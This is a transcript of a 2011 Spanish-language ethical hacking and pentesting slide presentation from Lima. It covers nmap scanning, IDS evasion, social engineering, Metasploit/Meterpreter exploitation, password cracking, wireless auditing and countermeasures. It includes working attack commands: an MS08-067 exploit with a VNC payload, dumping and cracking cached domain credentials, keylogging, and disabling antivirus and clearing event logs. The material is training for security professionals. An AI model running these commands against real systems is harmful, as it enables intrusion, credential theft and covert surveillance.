Lima, 24 Setiembre, 2011 - el-palomo.com³nv3.pdf · Omar Palomino –[email protected] 3 •“10...

34
[email protected] Lima, 24 Setiembre, 2011

Transcript of Lima, 24 Setiembre, 2011 - el-palomo.com³nv3.pdf · Omar Palomino –[email protected] 3 •“10...

[email protected]

Lima, 24 Setiembre, 2011

AGENDA

2 Omar Palomino – [email protected]

1 • Acerca del autor

2 • Introducción al Ethical Hacking

3 • Ethical Hacking vs Pentesting

4 • Escaneo de red organizacional

5 • Análisis de Vulnerabilidades

6 • Explotación de Vulnerabilidades

7 • Pentesting

8 • Prevención y contramedidas

24/09/2011

3 Omar Palomino – [email protected]

• “10 años” de experiencia en seguridad de información

• Psicólogo que aun no comienza sus estudios….

• Maestrista de Ing. de Computación y Sistemas

• Consultor en Seguridad de información, CEH

• Escritor en mis tiempos libres:

http://www.el-palomo.com

24/09/2011

1 • Acerca del autor

• Ethical Hacking = Hacker “bueno”

– Prevención de ataques mal intencionados.

– Análisis de vulnerabilidades preventivos

– Cumplimientos de normas: NTP, ISO 27001

– Uso de metodologías:

• OSSMT, OWASP, etc

– Cumplimiento de la legislación peruana

4 Omar Palomino – [email protected]

2 •Introducción al Ethical Hacking

24/09/2011

5 Omar Palomino – [email protected]

3 •Ethical Hacking vs Pentesting

24/09/2011

6 Omar Palomino – [email protected]

3 •Ethical Hacking vs Pentesting

24/09/2011

7 Omar Palomino – [email protected]

• Uso de herramientas:

– Nmap: La herramienta por excelencia.

– Tracert: Examina las rutas de llegada

– Consulta a los DNS (http://network-tools.com)

– Consúltale a Google

Tools:

* Maltego (veamos un ejemplo)

4 •Escaneo de red organizacional

24/09/2011

8 Omar Palomino – [email protected]

• NMAP:

Root# nmap –sV –O –T3 –PN –F <target>

4 •Escaneo de red organizacional

24/09/2011

9 Omar Palomino – [email protected]

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

ACK

Nmap reconoce que hay una conexión abierta: Bingo

10 Omar Palomino – [email protected]

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

ACK

Nmap NO reconoce que hay una conexión abierta

11 Omar Palomino – [email protected]

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

RST

Nmap reconoce que hay una conexión abierta: BINGO!

Root# nmap –sS –v <target>

12 Omar Palomino – [email protected]

• NMAP Avanzado: Técnicas evasivas de IPS/IDS

4 •Escaneo de red organizacional

24/09/2011

- F: Fragmentar paquetes

- sF: FIN Scan (Stealth Scan)

Omar Palomino – [email protected] 13

4 •Escaneo de red organizacional: Ing. Social

Llamadas telefónicas

Piggybacking

Escritorios limpios

Dumpster diving

Phishing

Redes Sociales

MALTEGO

24/09/2011

Omar Palomino – [email protected] 14

4 •Escaneo de red organizacional: Ing. Social

24/09/2011

Omar Palomino – [email protected] 15

5 • Análisis de Vulnerabilidades

Nessus

Qualys

Acunetix

Shadow Security Scanner

Bactrack

• Vulnerabilidades en S.O y

Aplicaciones

24/09/2011

Omar Palomino – [email protected] 16

5 • Análisis de Vulnerabilidades

Nessus

24/09/2011

Omar Palomino – [email protected] 17

Metasploit

24/09/2011

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

payload => windows/vncinject/bind_tcp

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST 192.168.117.129

RHOST => 192.168.117.129

msf exploit(ms08_067_netapi) > exploit

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 18

Metasploit

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 19

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 20

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Meterpreter: Familia de plugins avanzados de los mismos creadores de

Metasploit Framework, que se utiliza sobre sistemas comprometidos

y tienen como característica fundamental que todo es cargado en

memoria sin crear ningún proceso adicional ni dejar “rastros”

PS

SYSINFO

IDLETIME

Omar Palomino – [email protected] 21

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

PS SYSINFO

IDLETIME HASHDUMP

Omar Palomino – [email protected] 22

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto

SUPERPASSWORD

SUPERPA SSWORD

e52cac67419a9a22 4a3b108f3fa6cb6d

e52cac67419a9a224a3b108f3fa6cb6d

Omar Palomino – [email protected] 23

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

http://ophcrack.sourceforge.net/tables.php

http://www.freerainbowtables.com/en/tables/

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/

Omar Palomino – [email protected] 24

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

Almacenamiento contraseñas del Active Directory

Meterpreter> mkdir C:\cache

Meterpreter> upload /root/cache C:\cache

Meterpreter> cd C:\cache

Meterpreter> ls

C:\cachedump.exe > salida.txt

Meterpreter> download salida.txt

root@bt:/pentest/passwords/john# ./john --wordlist:password.lst -format:mscash salida.txt

Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x])

password (mpalomino)

superpassword (opalomino)

Omar Palomino – [email protected] 25

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos:

SNIFFING

Interfaces de red TECLADO

Meterpreter> ps

Meterpreter> migrate 1736

Meterpreter> getpid

Meterpreter> keyscan_start

Meterpreter> keyscan_dump

Meterpreter> keyscan_stop

Omar Palomino – [email protected] 26

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Screenshot Clearev

Webcam Run get_application_list

Winenum Excute –f cmd.exe –i -t

Run killav Download

Run enum_shares

Run service_maneger -l

Omar Palomino – [email protected] 27

Vistumbler

Android: Wifiscan, Wigle Wifi

Antena: Chipset Realtek o Atheros

Airmon

• Vulnerabilidades en

REDES INALAMBRICAS:

• Encontrar redes

vulnerables:

• Cifrado WEP

• Filtrado MAC

• Wardriving

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 28

¡Más de 30 redes

vulnerables!

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 29

¡Más de 20 redes

vulnerables!

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – [email protected] 30 24/09/2011

6 •Explotación de Vulnerabilidades AndroidScreenCast:

./adb kill-server

./adb star-server

Requerimientos para

auditoría wireless:

• Chipset Realtek, Atheros

• Antena con potencia

• Diversas herramientas:

airmon

Omar Palomino – [email protected] 31

• Vulnerabilidades en la

RED:

• Encontrar información

importante viajando en

la red.

• Contraseñas

• Conversaciones

• Acceso a segmentos

de red no autorizado.

6 •Explotación de Vulnerabilidades

Ettercap

Wireshark

Cain y Abel

SSLTrip

Metasploit

Airmon

24/09/2011

Omar Palomino – [email protected] 32

8 •Prevención y contramedidas

La Seguridad no es solo un proceso Tecnológico… Es

un proceso Organizacional

“El único sistema seguro es aquél que está apagado en el interior de un bloque de

hormigón protegido en una habitación sellada y

rodeada por guardias armados”.

Eric Raymond

24/09/2011

Omar Palomino – [email protected] 33

8 •Prevención y contramedidas

FACTOR TÉCNICO

* Firewall capa 3

* Firewall de aplicaciones

* Firewall de Bases de datos

* IPS/IDS

* Correlación de eventos

……….

FACTOR HUMANO

* Campañas de concientización

* Pruebas de ingeniería social

* Charlas y reuniones

…….

SISTEMA DE GESTIÓN

* Sistema de Gestión de seguridad de información (SGSI)

* ISO 27001 /17799

* Gestión de Riesgos (ISO 27005)

* ITIL, COBIT

……

24/09/2011

[email protected]

Lima, 24 Setiembre, 2011